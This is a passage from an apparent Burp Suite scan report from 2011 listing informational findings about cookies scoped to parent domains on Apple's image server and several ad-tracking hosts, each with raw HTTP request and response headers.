Set-Cookie: ccl=LvsMZVBspvaW4BUPGB6fKdPBPBPzE4AOtMKQi09iCxvY4N37bXjgonzBRHeFv2bG1tXHPZvA5MDeefh4/4TJNguxYj5BQwlRBhHp8PTaLmLqpAMt7mTrw8KDUlygfnKiG4Z2qArfl9OTnmApOm1vsUekipjsJLNg20mj9qF9yVGby+gT1Gmx0RyRL8RkbjcrMdJpW1HChNjPtBRas7ZTl7d+lqgklAWUbcu+NAnAIIIF1PpC8pejxLXSH0gVYkPbAxhBiAbc1JxNFqINo1qN9hJk3O2MQWv3SzuL9Wf9SajDU6i73sQ0InJo3gud5pExCGD4pGxQNmI1FNd763dPwNKMFx/s+AE3WDYZdU2V9GNIIz6x7Ih7McicbCDvHr6Htvkp4grfBYDv2dZfxkSViMVIcHIbpJM3oQKjws6IBGjACKCFM+r5EiYH+XqIkbkwT3vq3yO7XXMt4QsKmocL8aU/YwaxusrTYvZXLTiR3xnjy4OA+aV/AW+br6xTcZlDVGCDNfVBY/35TAWOdwplNEto/K0MAMDKYqZXRoyu9sulNBarcwVrWptUiw5X1lfq; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.25. http://images.apple.com/global/scripts/search_decorator.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/search_decorator.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/search_decorator.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "230-4a05bce73b440"
If-Modified-Since: Thu, 07 Apr 2011 22:41:13 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Apr 2011 22:41:13 GMT
ETag: "230-4a05bce73b440"
Cache-Control: max-age=529
Expires: Tue, 12 Jul 2011 18:07:55 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=uBJRarGVcixAAGSJWzd8d3vxOg/2vSQlRKgrn/RhMuw6NOSdGGc7KhKoy98rT4JxkLPJGcA3G9JVZAKGGUeg0rfqqiJYEIZH3tG4GNao0NE7SqYO5kHNKRZnb2vkIh1+qYDl2ifZGy0POZ8QUYLzaCgiyNlZL5VDv9NhNWAjp97Is3YF3y20l8guUegLMOCwy6y7HJkzOBGxL/wFIxpaDfsp6aWi54M6uHhC29rySJuwnL+BWcVS9xqn+jQhS7msFYsY6R18o5ZJvdSAXByGqbg5REtWpLPIc/PzKvQjdnFOwWp2VlAL0jSLM7hGj7OIeIhamPPUj0ngSnKdT4xp04otxwH1GY1IGzoRcshhLZQWrPkz1JsU7/uXu0Ed9ByhWoKIxYzGOjc2Ss00WUF3y8kbPP/lRbac1Y8eT9J6atlIuTt9+NMYlbNDfZm3kD6KaRdxmy6hzYkPx8geQioXgS601762LWOwcz+/LpnFHCVXRR2bOG+Hn/yrMTk2X42217IRhIBUtth/MeUn6F3SxLHf7nnWg02vBWP8Fq4jLMxGg1I5euN50ftaUZfEaj3A; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.26. http://images.apple.com/global/styles/base.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/styles/base.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/styles/base.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "7d0c-4a28e6fd30a00"
If-Modified-Since: Thu, 05 May 2011 21:55:52 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Thu, 05 May 2011 21:55:52 GMT
ETag: "7d0c-4a28e6fd30a00"
Cache-Control: max-age=499
Expires: Tue, 12 Jul 2011 18:07:25 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=KajDDzf8359RIllNsZwDVIn4PhDV2a/MovXkjKgPIrS/hlS53q1JEe6rc01cFrsDdvrbccTge9mICJtvoZSIMg2qwrFXIVIfLh83DVGUTVzE88u69+1qWUa0nsoV9ZBXI5VC1aYFMQoKN+re9dwttn3vAgAryoBer9Blq44l+etpRQe2iTZg4vfWg5coocOCVmgBetXruD2T5RxwRnvz3jCd3+78NTu5N8h75eTqhGInDJqrs12upYnx7R2AOfFDZ3MaD5/ZxBv/4g0YMW18kSHsbj3Wyy86hXmyt9nsiLAdQlxCbNOHx+4osjg8XCP89Ab/65LLAZiQBHCPKGyoMQvrJXqK2pndhdjTDh08xFDqxhqGk9IFY5rZ9mmUQhZL/djoMdk99Ai2w2OytbYFO5j+jEFERbJhmtOxA8XIhp6ntRgwBRDDb88kpxgwAIQA38MbeQIDt3TNd09PM7jZ9Zb6Iwqx9iaSqkwLP/nd/xxegQNdOZhzAOp5e5f54LOADbbvSAEePr5p0WDeJXJ7sbWl7Gsj/T4YqXwORulv161moKa4iW+ZwTFrJEUN8pac; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.27. http://images.apple.com/global/styles/itunesmodule.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/styles/itunesmodule.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/styles/itunesmodule.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "d46-48f2ddda94180"
If-Modified-Since: Wed, 01 Sep 2010 07:44:22 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 01 Sep 2010 07:44:22 GMT
ETag: "d46-48f2ddda94180"
Cache-Control: max-age=506
Expires: Tue, 12 Jul 2011 18:07:32 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=hbVmdnpxNIgF+OiSJhok9CMWAzQhliHSQUaBAqwwAw1cUBvzE+pThCdfyIeFNPO0uBm2HVywloeii+ejfp56dywlCAv2HvSHu8ETLcRlTeGEuLnobqfKF+tYcs8BOzPt7KgfPldd4eJWTNOxhIChlCyJycuYGuo/aMTtUigvqr3S3p9d9ZklWvqGwj5f7h0rMCr0X5kwMhQF1pbWImeuCQUKtD/a4fxbAr5sqvEyYW9vUOgdrz9GHO7a9H5ot4fdHaE7v55cIT2P1g86itrgY8rb7nwTkVIE2aP0I3wXy3EpXgf7Pe8ge3nJNI4YbFyuM/kZzRqSatLfkKQvk0gtMRiYfeszzZfzGbaLDcZrHx05ZZ0/IyCT5BTCNP2AYe+qNk9IQM3u4EVOhQ6Vss5xwG3zF/lxxcV3JQY0Xj4jn1lj+jRiBRbjz1WjNIapP5Gffzzt6XK+55KPGo78F4IPWcJdKCF8+qErt/JjnHlWfTQBE0yiQw2LfK1kXBySN54ZRVdtarn3lxRLShUoa+ntmaWxQkNc92IG2NZZth4JzaYEWbsLjvThzDg9Sr7NDex/; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.28. http://images.apple.com/itunes/home/styles/home.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /itunes/home/styles/home.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /itunes/home/styles/home.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "8aa-4a4e72621e9c0"
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 30 Jun 2011 23:20:56 GMT
ETag: "90f-4a6f62728e600"
Vary: Accept-Encoding
Server: Apache/2.2.3 (Oracle)
X-Cached-Time: Fri, 01 Jul 2011 00:29:49 GMT
Cteonnt-Length: 2319
Content-Type: text/css
Content-Length: 2319
Cache-Control: max-age=339
Expires: Tue, 12 Jul 2011 18:04:45 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Set-Cookie: ccl=1FciQd7giiJFEgv4vVPtMCBm7MZFgP3pI/vKQFStWClpRPhHQ3zP3nifi6OoK7SJm2x8HuCaAZ0okoSGVfzga0qB+Yj/bOcikQ4AhQPJ2J9zYOJu8IlZkWZf5AOzCPtxm33ikuaRS52LsB2FYvoSdBdbx9M53ArvvI4ElGA2adH+6bhRVxCRalHv2m0y3p+0yBuW5NB9xNj7uDFQhY+GWBCl8WtASWNuA3Rz8Q5J+ucOFGHueE7DC+Kka0HSvZ0uhTmjNtru2ipqpkoKe4kTNSyeoI/hT4HgUMiUzszj0f0J7fm4K2wp3h7NHocDwWbooSP/RMUOkiLNwaYD+3Ed+3JYffJC9wt3JNLtCSI3BEIqS8c3L5WKXc3/sHFN3A+qpiIGFCS0dOwXNofTCtSVi9mz2BtrPek+4uHVXMFWNrxir5yGDH2GG/p9aLl5uDHiPAzTXvR2c957Yq6MKYQm9hBiD+5/qGaJcz9SC3ShTTM5oxp2A46dVTVnaO9vqJYb2G5nEMOBaTiIOETdHfzDXMUQmGYLD6SzeZOPV9zbf7zIe9WDPN2D/Mpqw3CWYAvm; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

/* heros */
#main .hero { padding-top:76px; padding-bottom:33px; *padding-bottom: 0; border-color: #E5E5E5 #DBDBDB #D2D2D2; background:#fafafa; background:-webkit-gradient(linear, 0 0, 0 100%, from(#f
...[SNIP]...

10.29. http://images.apple.com/itunes/styles/itunes.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /itunes/styles/itunes.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /itunes/styles/itunes.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "1c2a-4a4fc3ffb72c0"
If-Modified-Since: Sun, 05 Jun 2011 19:46:59 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Sun, 05 Jun 2011 19:46:59 GMT
ETag: "1c2a-4a4fc3ffb72c0"
Cache-Control: max-age=466
Expires: Tue, 12 Jul 2011 18:06:52 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=kzcWN2xwscEDNLz4LsP8A+1esMW2xKyzkKKkvArVL9MstmsliwY6LtcUQ3+29SOj+20afrvi4F5iKw/pRCu+HDWWGKPctI/ZQnGjnSwmJQ6L1VqEpU12SUCNObJzJJLe4uzOp8j6a+aF4qCE5Mmrh8XSgj7vvA8MfK4iT9IdBew5EIHB9jCco1VJeZ5pX7zuKpS7f0jfXkS7JRPOYu4j6szcVOcRtYi8cdjtPOYLYpZHSc1EffdIN+EXBJ3S9P/gR9wiSvV+X+weNLfAmP9o5ycM0nkrZNbOyzdJa1BzWen5EDDKQg7jSYECbCA8iHr1qtpYOaxaC/Pjel+7EilWxxIWZC0xow8g/3XvePxjCV4lE+xMUtBoM+bCivcDfXDPVPvNcumNNe0ZBhqd2BRk3kT3G0kO5YR5xQ6yzXiZ9vYY1Wx3JEi/4F7hVbGI2tF9OXzFGHn7zXRPA+PdEAqxM8YDEE7Y6UmiC5iwqzsDfpvNU2VW5m4hoquq/jm8RUVhGbZOCs3ap30jHF7PHlHSH/3yqLPvNlcOq7bCQWMFpXdVZixeGx2YPt987Q3XgL9H; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.30. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=pacsunwear_cs=1&betq=11722=423719nc=1310503191? HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; BASE=x7Q9ni23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHhGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOID7s5rzN9mUM7Zk/KlL!; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; F1=BQ+HN4EBAAAABAAAAUAAqBA; ROLL=U6APDjegFREW39A!; C2=NWwGOFJwAob0FEbsKewubaIDtKfAC0nRlJpwIg02FAHCdbdBwhwihXAcIQbmGAHCsGeBwhAQvaAcIQW4FAHCLppBwhQBaaAcIgZ4FAHCAGeBwhQ3gZAcIgJaGAHCcbpBwhAxBaAcIMqsGAHCBHoBwhgWaaAcIYnXGAHC1mpBwhQUXaAcI4xlGAHCEdpBwhQwZaAcIcxvGAHCY8rBwhQjWaAcIYxvGAHCKopBwhQRgaAcI0soGAHCZTeBwFZAfZOiGBaj0Xw+NXsYzGmAPSqBkRqHBUbNGbHsDGAzPaAe3KdAsyrR4Rb+BMzrGlnreQAL/ZEpGe7JrAah5A; GUID=MTMxMDM5Mzc0MTsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 12 Jul 2011 20:39:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=YELHOFJwAob0FYVsKawubaYstKfAC0nRKIpwIg02FUBCdbdBVgwihXQFIQbmGUBCsGeBVgAQvaQFIQW4FUBCLppBVgQBaaQFIgZ4FUBCAGeBVgQ3gZQFIgJaGUBCcbpBVgAxBaQFIMqsGUBCBHoBVggWaaQFIYnXGUBC1mpBVgQUXaQFI4xlGUBCEdpBVgQwZaQFIcxvGUBCY8rBVgQjWaQFIYxvGUBCKopBVgQRgaQFI0soGUBCZTeBVEZAfZOiGVUj0Xw+NX8BzGmAPSqBJQqHBUbNGvBsDGAzPaQH3KdAsyrRdQb+BMzrG5hreQAL/ZUSGerJrAahe3qyIcydGAH; domain=advertising.com; expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/
Set-Cookie: GUID=MTMxMDUwMzE5MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Thu, 11-Jul-2013 20:39:52 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 12 Jul 2011 21:39:52 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.31. http://pixel.mathtag.com/data/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /data/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/img?mt_id=100036&mt_dcid=1310503209 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1310488542; mt_mop=10001:1310488542|10002:1310068527|4:1308922018|5:1310068391

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3d 6973
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 12 Jul 2011 20:40:11 GMT
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1310503211; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 20:40:11 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

10.32. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=776749753;fpan=0;fpa=P0-1840915809-1310503155904;ns=0;url=http%3A%2F%2Fwww.popcap.com%2Fallgames.php;ref=http%3A%2F%2Fwww.popcap.com%2F;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1310503165109;tzo=300;a=p-9admVzrPiptk2;labels=Web.Casual HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EFgAFPaeApll_6ixz4EBqAEBmgeBlw4ZrRpcjB9uThocKRkvrhkb4gzhXR4Q0Q4Q0ZOG_RGqL5EogQ9w4RB8gRmhDlTzDRuzCl4UAwUAyBO0HFO5E9FOEA_TD4sqgQAAyE8fpPc

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/8171//99D2/
Set-Cookie: d=EOIAFPaeApll_6ixz4EBrAEBmgeBlw4ZrRpcjB9uThocKRkvrhkb4gzhXR4Q0Q4Q0ZOG_RGqL5EogQ9w4RB8gRmhDlTzDRuzCl4UAwUAyBO0HFO5E9FOEA_TD4sqgQAAyE8Rw9pLsQ; expires=Mon, 10-Oct-2011 20:39:25 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Tue, 12 Jul 2011 20:39:25 GMT
Server: QS


10.33. http://pixel.rubiconproject.com/d.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /d.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /d.php?v=1224_1&cb=1310503209 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; put_2188=FoBpo1AIykup_RbIztZ-hw; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1; 